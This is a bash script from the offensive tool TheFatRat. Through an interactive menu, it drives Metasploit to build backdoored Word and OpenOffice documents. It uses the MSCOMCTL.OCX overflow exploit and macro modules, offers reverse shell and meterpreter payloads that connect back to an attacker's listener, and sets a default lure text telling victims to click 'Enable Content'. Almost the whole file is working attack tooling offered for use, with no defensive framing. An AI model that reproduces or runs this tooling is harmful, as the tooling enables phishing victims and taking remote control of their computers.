#!/bin/bash

#metasploit modules 
#microsoft metasploit packet auto create backdoor macro attack
#code by edo maland > screetsec
#part of fatrat feature
#compatible with metasploit metasploit v4.14.0-dev { new payload in metasp 2017 like macro} 

APPNAME='Microsfot Metasploit Packet [ Easy ]'
VERSION='1.0.0'
NAME='Screetsec - Edo Malad '
CODENAME='Mario Bros'
path=`pwd`
cyan='\e[0;36m'
green='\e[0;34m'
okegreen='\033[92m'
lightgreen='\e[1;32m'
white='\e[1;37m'
red='\e[1;31m'
yellow='\e[1;33m'
BlueF='\e[1;34m' #Biru
RESET="\033[00m" #normal


#start postgresql start
clear
echo -e $yellow " start postgresql .... "
service postgresql start

# spinner for Metasploit Generator
spinlong ()
{
    bar=" +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ "
    barlength=${#bar}
    i=0
    while ((i < 100)); do
        n=$((i*barlength / 100))
        printf "\e[00;32m\r[%-${barlength}s]\e[00m" "${bar:0:n}"
        ((i += RANDOM%5+2))
        sleep 0.02
    done
}


# spinner for random seed generator
spinlong2 ()
{
    bar=" 01100111001001001110111001101010101010110101001010111001010101010101010"
    barlength=${#bar}
    i=0
    while ((i < 100)); do
        n=$((i*barlength / 100))
        printf "\e[00;32m\r[%-${barlength}s]\e[00m" "${bar:0:n}"
        ((i += RANDOM%5+2))
        sleep 0.02
    done
}




#for checking if your command is correct
gboor ()
{
cat << !
  Generate Backdoor
  +------------++-------------------------++-----------------------+
  | Name       ||  Descript   	          || Your Input
  +------------++-------------------------++-----------------------+
  | LHOST      ||  The Listen Addres      || $yourip
  | LPORT      ||  The Listen Ports       || $yourport
  | OUTPUTNAME ||  The Filename output    || $fira
  +------------++-------------------------++-----------------------+


!
}


#for checking if your command is correct when embed backdoor
gboor2 ()
{
cat << !
  Generate Backdoor
  +------------++-------------------------++-----------------------+
  | Name       ||  Descript   	          || Your Input
  +------------++-------------------------++-----------------------+
  | LHOST      ||  The Listen Addres      || $yourip
  | LPORT      ||  The Listen Ports       || $yourport
  | OUTPUTNAME ||  The Filename output    || Apk_embed_backdoor.apk
  +------------++-------------------------++-----------------------+


!
}



f_un_des () {
echo -e "\t$white||  "$white" |=| "$okegreen"$APPNAME $white||"
echo -e "\t||  $white |=| "$okegreen"Version : $VERSION \t\t   $white   ||"
echo -e "\t||  $white |=| "$okegreen"Code by : $NAME $white    || "
echo -e "\t||  $white |=| "$okegreen"Codename: $CODENAME $white \t\t      || "
echo -e $white"\t||"$red"============================================$white||\n"
}


f_un_ban (){

echo -e $red"  <==============================================>"
echo -e $white"  ||$okegreen  _____ _             _____     _     _ _    $white||"
echo -e $white"  ||$okegreen |     |_|___ ___ ___|   __|___| |___|_| |_  $white||"
echo -e $white"  ||$okegreen | | | | |  _|  _| . |__   | . | | . | |  _| $white||"
echo -e $white"  ||$okegreen |_|_|_|_|___|_| |___|_____|  _|_|___|_|_|   $white||"
echo -e $white"  ||                             | |            $white||"
echo -e $red"  <===================================================>"

}

f_un_show () {
	f_un_des	
	echo -e $white"  |"$okegreen"0x1$white| "$cyan"Microsoft Stack overflow in MSCOMCTL.OCX"
	echo -e $white"  |"$okegreen"0x2$white| "$cyan"The Microsoft Office Macro on Windows "
	echo -e $white"  |"$okegreen"0x3$white| "$cyan"The Microsoft Office Macro on Mac OS X "
	echo -e $white"  |"$okegreen"0x4$white| "$cyan"Apache OpenOffice on Windows (PSH)"
	echo -e $white"  |"$okegreen"0x5$white| "$cyan"Apache OpenOffice on Linux/OSX (Python)"
	echo -e $white"  |"$okegreen"0x6$white| "$cyan"Exit\n"

}

f_op_1 () {
			
					echo -e $red"   Worked on Microsoft Office 2007 [no-SP/SP1/SP2/SP3] English on Windows [XP SP3 / 7 SP1] "
					echo -e $okegreen""
					echo -ne "   SET LHOST : ";tput sgr0
					read yourip
					echo ""
					echo -ne $okegreen "  SET LPORT : ";tput sgr0
					read yourport
					echo ""
					echo -ne $okegreen "  Please enter the base name for output files :" ;tput sgr0
					read fira
					echo ""
					payloads=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "windows/shell_bind_tcp" FALSE "windows/shell/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp_dns" FALSE "windows/meterpreter/reverse_http" FALSE "windows/meterpreter/reverse_https" --width 350 --height 265) > /dev/null 2>&1
					spinlong
					echo ""
					echo ""
					gboor
					spinlong
					echo ""
         				xterm -T " TheFatRat < DOC BUILDER > " -geometry 110x23 -e "$msfconsole -x 'use exploit/windows/fileformat/ms12_027_mscomctl_bof; set payload $payloads ; set FILENAME $fira.doc; set lhost $yourip ; set lport $yourport; exploit; exit -y'"
         				echo ""
         				mv ~/.msf4/local/$fira.doc $path/output/$fira.doc 
         				echo -e $okegreen""
         				echo -e $yellow"  Backdoor doc Saved To output Folder "
					sleep 5	
					echo
					echo -e $okegreen"  Press any key to continue ......... "
					read aw			
}


f_op_2 () {
					echo -e $red"   Worked on Microsoft Office on Windows  "
					echo -e $okegreen""
					echo -ne "   SET LHOST : ";tput sgr0
					read yourip
					echo ""
					echo -ne $okegreen "  SET LPORT : ";tput sgr0
					read yourport
					echo ""
					echo -ne $okegreen "  Enter the base name for output files : " ;tput sgr0
					read fira
					echo ""
					#setup body
					echo -ne $okegreen "  Enter the message for the document body (ENTER = default) : " ;tput sgr0
					read bodys
					#echo $bodys
						if [[ "$bodys" == "" ]]; then
							bodys="Contents of this document are protected. Please click Enable Content to continue."
							#echo $bodys
					
						fi
					#setupexe
					echo""
					echo -ne $okegreen "  Are u want Use custom exe file backdoor ( y/n ): " ;tput sgr0
					read exe
						if [ $exe != 'y' ] && [ $exe != 'Y' ]
							then
					#payload n					
					echo ""
					payloads=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "windows/shell_bind_tcp" FALSE "windows/shell/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp_dns" FALSE "windows/meterpreter/reverse_http" FALSE "windows/meterpreter/reverse_https" --width 350 --height 265) > /dev/null 2>&1
					spinlong
					echo ""
					echo ""
					gboor
					spinlong
					echo ""
         				xterm -T " TheFatRat < DOC BUILDER > " -geometry 110x23 -e "$msfconsole -x 'use exploit/multi/fileformat/office_word_macro; set payload $payloads ; set FILENAME $fira.docm; set BODY $bodys; set lhost $yourip ; set lport $yourport; exploit; exit -y'"
         				echo ""
         				mv ~/.msf4/local/$fira.docm $path/output/$fira.docm 
         				echo -e $okegreen""
         				echo -e $yellow"  Backdoor doc Saved To output Folder "
					echo ""
					echo -e $okegreen"  Press any key to continue ......... "
					read aw	
					man menu
					
						elif [ $exe != 'n' ] && [ $exe != 'N' ]
							then
					#payload y
					echo ""
					echo -ne $okegreen "  Located file (example:/output/backdoor.exe) :" ;tput sgr0
					read path
					echo ""
					payloads=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "windows/shell_bind_tcp" FALSE "windows/shell/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp_dns" FALSE "windows/meterpreter/reverse_http" FALSE "windows/meterpreter/reverse_https" --width 350 --height 265) > /dev/null 2>&1
					spinlong
					echo ""
					echo ""
					gboor
					spinlong
					echo ""
         				xterm -T " TheFatRat < DOC BUILDER > " -geometry 110x23 -e "$msfconsole -x 'use exploit/multi/fileformat/office_word_macro; set payload $payloads ; set FILENAME $fira.docm; set BODY $bodys; set lhost $yourip ; set lport $yourport; set EXE::Custom $path; exploit; exit -y'"
         				echo ""
         				mv ~/.msf4/local/$fira.docm $path/output/$fira.docm 
					echo ""
         				echo -e $yellow"  Backdoor doc Saved To output Folder "
					echo ""
					echo -e $okegreen"  Press any key to continue ......... "
					read aw
					fi
					mainmenu
}


f_op_3 () {
					echo -e $red"   Worked on Libre Office on Mac ( Python )  "
					echo -e $okegreen""
					echo -ne "   SET LHOST : ";tput sgr0
					read yourip
					echo ""
					echo -ne $okegreen "  SET LPORT : ";tput sgr0
					read yourport
					echo ""
					echo -ne $okegreen "  Enter the base name for output files : " ;tput sgr0
					read fira
					echo ""
					#setup body
					echo -ne $okegreen "  Enter the message for the document body (ENTER = default) : " ;tput sgr0
					read bodys
					#echo $bodys
						if [[ "$bodys" == "" ]]; then
							bodys="Contents of this document are protected. Please click Enable Content to continue."
							#echo $bodys
						fi
					#setupexe
                           
					echo""
					echo -ne $okegreen "  Are u want Use custom exe file backdoor ( y/n ): " ;tput sgr0
					read exe
						if [ $exe != 'y' ] && [ $exe != 'Y' ]
							then
					#payload n
					
					echo ""
					payloads=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "python/meterpreter/reverse_tcp" FALSE "generic/shell_reverse_tcp" --width 350 --height 265) > /dev/null 2>&1
					spinlong
					echo ""
					echo ""
					gboor
					spinlong
					echo ""
         				xterm -T " TheFatRat < DOC BUILDER > " -geometry 110x23 -e "$msfconsole -x 'use exploit/multi/fileformat/office_word_macro; set payload $payloads ; set FILENAME $fira.docm; set BODY $bodys; set lhost $yourip ; set lport $yourport; set target 1; exploit; exit -y'"
         				echo ""
         				mv ~/.msf4/local/$fira.docm $path/output/$fira.docm 
         				echo -e $okegreen""
         				echo -e $yellow"  Backdoor doc Saved To output Folder "
					echo ""
					echo -e $okegreen"  Press any key to continue ......... "
					read aw	
					man menu
						elif [ $exe != 'n' ] && [ $exe != 'N' ]
							then
					#payload y
					echo ""
					echo -ne $okegreen "  Located file (example:/output/backdoor.exe) :" ;tput sgr0
					read path
					fi
					echo ""
					payloads=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "python/meterpreter/reverse_tcp" FALSE "generic/shell_reverse_tcp" --width 350 --height 265) > /dev/null 2>&1
					spinlong
					echo ""
					echo ""
					gboor
					spinlong
					echo ""
         				xterm -T " TheFatRat < DOC BUILDER > " -geometry 110x23 -e "$msfconsole -x 'use exploit/multi/fileformat/office_word_macro; set payload $payloads ; set FILENAME $fira.docm; set BODY $bodys; set lhost $yourip ; set lport $yourport; set EXE::Custom $path; set target 1; exploit; exit -y'"
         				echo ""
         				mv ~/.msf4/local/$fira.docm $path/output/$fira.docm 
         				echo -e $okegreen""
         				echo -e $yellow"  Backdoor doc Saved To output Folder "
					echo ""
					echo -e $okegreen"  Press any key to continue ......... "
					read aw
					mainmenu
}


f_op_4 () {
					echo -e $red"   Apache OpenOffice on Windows (PSH) "
					echo -e $okegreen""
					echo -ne "   SET LHOST : ";tput sgr0
					read yourip
					echo ""
					echo -ne $okegreen "  SET LPORT : ";tput sgr0
					read yourport
					echo ""
					echo -ne $okegreen "  Enter the base name for output files : " ;tput sgr0
					read fira
					echo ""
					#setup body
					echo -ne $okegreen "  Enter the message for the document body (ENTER = default) : " ;tput sgr0
					read bodys
					#echo $bodys
						if [[ "$bodys" == "" ]]; then
							bodys="Contents of this document are protected. Please click Enable Content to continue."
							#echo $bodys
						fi

					echo ""
					payloads=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "windows/shell_bind_tcp" FALSE "windows/shell/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp_dns" FALSE "windows/meterpreter/reverse_http" FALSE "windows/meterpreter/reverse_https" --width 350 --height 265) > /dev/null 2>&1
					spinlong
					echo ""
					echo ""
					gboor
					spinlong
					echo ""
         				xterm -T " TheFatRat < DOC BUILDER > " -geometry 110x23 -e "$msfconsole -x 'use exploit/multi/misc/openoffice_document_macro; set payload $payloads ; set FILENAME $fira.odt; set BODY $bodys; set lhost $yourip ; set lport $yourport; exploit; exit -y'"
         				echo ""
         				mv ~/.msf4/local/$fira.odt $path/output/$fira.odt
         				echo -e $okegreen""
         				echo -e $yellow"  Backdoor doc Saved To output Folder "
         				echo ""
					echo -e $okegreen"  Press any key to continue ......... "
					read aw
					mainmenu

}

f_op_5 () {
					echo -e $red"   Apache OpenOffice on Windows (PSH) "
					echo -e $okegreen""
					echo -ne "   SET LHOST : ";tput sgr0
					read yourip
					echo ""
					echo -ne $okegreen "  SET LPORT : ";tput sgr0
					read yourport
					echo ""
					echo -ne $okegreen "  Enter the base name for output files : " ;tput sgr0
					read fira
					echo ""
					#setup body
					echo -ne $okegreen "  Enter the message for the document body (ENTER = default) : " ;tput sgr0
					read bodys
					#echo $bodys
						if [[ "$bodys" == "" ]]; then
							bodys="Contents of this document are protected. Please click Enable Content to continue."
							#echo $bodys
						fi

					echo ""
					payload=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "python/meterpreter/reverse_tcp" FALSE "linux/x86/shell_reverse_tcp" FALSE "linux/x86/meterpreter/reverse_tcp" FALSE "osx/armle/shell_reverse_tcp" FALSE "osx/ppc/shell_reverse_tcp" FALSE "bsd/x86/shell/reverse_tcp" FALSE "solaris/x86/shell_reverse_tcp" --width 350 --height 300) > /dev/null 2>&1
					spinlong
					echo ""
					echo ""
					gboor
					spinlong
					echo ""
         				xterm -T " TheFatRat < DOC BUILDER > " -geometry 110x23 -e "$msfconsole -x 'use exploit/multi/misc/openoffice_document_macro; set payload $payloads ; set FILENAME $fira.odt; set BODY $bodys; set lhost $yourip ; set lport $yourport; exploit; exit -y'"
         				echo ""
         				mv ~/.msf4/local/$fira.odt $path/output/$fira.odt
         				echo -e $okegreen""
         				echo -e $yellow"  Backdoor doc Saved To output Folder "
					echo ""
					echo -e $okegreen"  Press any key to continue ......... "
					read aw
					mainmenu

}


mainmenu () {
	clear
	f_un_ban && f_un_show
	echo -ne $okegreen"\t"$red"<"$white"{"$okegreen"0x25/Choice"$white"}"$red"> " $RESET
	read mainchoice
	echo
	case $mainchoice in 
	1) f_op_1 ;;
	2) f_op_2 ;;
	3) f_op_3 ;;
	4) f_op_4 ;;
	5) f_op_5 ;;
	6|Q|q|exit|quit) exit ;;
	*) mainmenu ;;
	esac

}

clear
mainmenu

